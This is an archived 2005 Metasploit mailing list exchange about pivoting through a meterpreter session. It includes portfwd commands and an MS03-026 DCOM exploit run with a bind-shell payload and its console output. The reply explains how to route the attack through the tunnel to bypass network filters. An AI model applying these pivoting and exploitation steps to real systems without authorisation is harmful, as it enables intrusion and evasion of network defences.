Metasploit mailing list archives
use of meterpreter
From: mmiller at hick.org (mmiller at hick.org)
Date: Thu, 14 Apr 2005 02:34:57 -0500
On Thu, Apr 14, 2005 at 09:10:12AM +0200, Thomas Werth wrote:
1. Exploitet "proxy victim" with metasploit's meterpreter payload. 2. In meterpreter "shell" i'm adding some portfwd's like this : - portfwd -a -l 9500 -h 'nextTargetIP' -p 135 - portfwd -a -l 4444 -h 'nextTargetIP' -p 4444 -P //-P is just another test in hope it will work this time ... 3. now i'm using msrpc exploit with win32_bind payload Setting Options to msf msrpc_dcom_ms03_026(win32_bind) > show options Exploit and Payload Options =========================== Exploit: Name Default Description -------- ------ ----------- ------------------ required RHOST 'ProxyHost' The target address required RPORT 9500 The target port Payload: Name Default Description -------- -------- ------- ------------------------------------------ required EXITFUNC thread Exit technique: "process", "thread", "seh" required LPORT 4444 Listening port for bind shell Target: Windows NT SP6/2K/XP/2K3 ALL 4. now launching exploit msf msrpc_dcom_ms03_026(win32_bind) > exploit 5. that's where it hangs : [*] Starting Bind Handler. [*] Got connection from 'HOST_I_USE_FOR_ATTACK':32773 <-> 'PROXY_HOST':4444 6. Waited long enough, killed connetion with strg-C Caught interrupt, exit connection? [y/n] y [*] Exiting Bind Handler. What am i doing wrong, or isn't it possible to use portfwd so attacks can be redirected through a proxy ?
The thing to note is that connections are proxied from your local machine through the meterpreter connection to the target that you are trying to reach. In the example you provided above, it appears that you are expecting the port forwards to be listening on the proxy host that you initially exploited. Instead, you should expect the port forward listeners to be listening on your local machine. All of the steps you performed were correct, except instead of using 'ProxyHost' you should use 127.0.0.1 for RHOST. I imagine the reason the bind handler got a connection is because you exploited the 'ProxyHost' with win32_bind (using port 4444). The reason connections are proxied starting from your local machine is because this allows you to transparently bypass any sort of inbound or outbound filters (since it tunnels through the already established meterpreter communication channel). Hope that helps!
Current thread:
- use of meterpreter Thomas Werth (Apr 14)
- use of meterpreter mmiller at hick.org (Apr 14)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 14)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 15)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 15)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 15)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 18)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
- use of meterpreter mmiller at hick.org (Apr 14)